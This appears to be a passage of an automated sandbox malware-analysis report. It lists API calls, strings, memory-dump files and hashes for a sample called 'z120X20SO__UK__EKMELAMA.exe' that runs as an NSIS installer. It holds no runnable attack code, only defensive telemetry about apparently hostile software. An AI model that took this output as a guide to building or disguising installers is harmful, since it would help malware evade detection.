                                                                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                                                                                                              • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                                                                                                              • CharNextA.USER32(?,"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                                                                                                              • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                                                                                                              Strings
                                                                                                                                                              • *?|<>/":, xrefs: 0040641A
                                                                                                                                                              • "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe", xrefs: 0040640E
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 589700163-1586417121
                                                                                                                                                              • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                                                                              • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                                                                                                              • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                                                                                                              • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 0040423D
                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404255
                                                                                                                                                              • GetSysColor.USER32(?), ref: 00404268
                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00404278
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404292
                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                              • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                              • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                                                                                                              • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                              • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 6F951215: GlobalAlloc.KERNEL32(00000040,6F951233,?,6F9512CF,-6F95404B,6F9511AB,-000000A0), ref: 6F95121D
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F9525DE
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F952618
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2314184359.000000006F951000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F950000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2314019695.000000006F950000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314334219.000000006F953000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314455683.000000006F955000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_6f950000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$Free$Alloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1780285237-0
                                                                                                                                                              • Opcode ID: 9ddd6711b8a0c1023e11019e95aa9005ce75920e4a14c383403123ef80c10ee5
                                                                                                                                                              • Instruction ID: 7532f147c5341a18661ffa0e0fdf8a37ea3ab2e5227498a317b8e1511382dc02
                                                                                                                                                              • Opcode Fuzzy Hash: 9ddd6711b8a0c1023e11019e95aa9005ce75920e4a14c383403123ef80c10ee5
                                                                                                                                                              • Instruction Fuzzy Hash: FF41BD72508200EFEB15CF78CC98C2A77BAEB86324B104569F50197180DB32E93ACF61
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                                                                                                              • GetMessagePos.USER32 ref: 00404AF1
                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                              • String ID: f
                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                              • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                              • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                                                                                                              • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                              • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                                                                                                              APIs
                                                                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DD5
                                                                                                                                                              • MulDiv.KERNEL32(000CBF66,00000064,000CD150), ref: 00402E00
                                                                                                                                                              • wsprintfA.USER32 ref: 00402E10
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                                                                                                              Strings
                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402E0A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                              • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                                                                                                              • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                                                                                                              • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                                                                                                              • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                                                                                                              APIs
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                              • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                                                                                                              • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                                                                                                              • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                                                                                                              • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(Dehache172 Setup: Installing,Dehache172 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                                                                                                              • wsprintfA.USER32 ref: 00404A6A
                                                                                                                                                              • SetDlgItemTextA.USER32(?,Dehache172 Setup: Installing), ref: 00404A7D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                              • String ID: %u.%u%s%s$Dehache172 Setup: Installing
                                                                                                                                                              • API String ID: 3540041739-2215776448
                                                                                                                                                              • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                                                                                                              • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                                                                                                              • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                                                                                                              • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2314184359.000000006F951000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F950000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2314019695.000000006F950000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314334219.000000006F953000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314455683.000000006F955000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_6f950000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeGlobal
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2979337801-0
                                                                                                                                                              • Opcode ID: 9f4dc4761cd2e10f8686f55e16525eb1430be424a52be6a0d22d298f56bb3fae
                                                                                                                                                              • Instruction ID: 0dbb70b12748827e0df72278222ce70227b70d89a824732517d324b7ddcd7a88
                                                                                                                                                              • Opcode Fuzzy Hash: 9f4dc4761cd2e10f8686f55e16525eb1430be424a52be6a0d22d298f56bb3fae
                                                                                                                                                              • Instruction Fuzzy Hash: 8B51E032D04258AADB62CFF8D9509AEBBB9AF43359F14025BD508A71E1C331E9F18761
                                                                                                                                                              APIs
                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                                              • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                                                                                                              • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                                                                                                              • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                                                                                                              • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                                                                                                              • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                                                                                                              • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                              • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                                                                                                              • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                                                                                                              • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                                                                                                              • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                              • String ID: !
                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                              • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                                                                                                              • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                                                                                                              • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                                                                                                              • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Dehache172 Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                                                                                                                • Part of subcall function 00405B28: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,?,00405B94,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                                                                                                                • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                                                                                                                • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv6948.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                                                                                                              • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv6948.tmp
                                                                                                                                                              • API String ID: 3248276644-2462342609
                                                                                                                                                              • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                                                                                                              • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                                                                                                              • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                                                                                                              • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
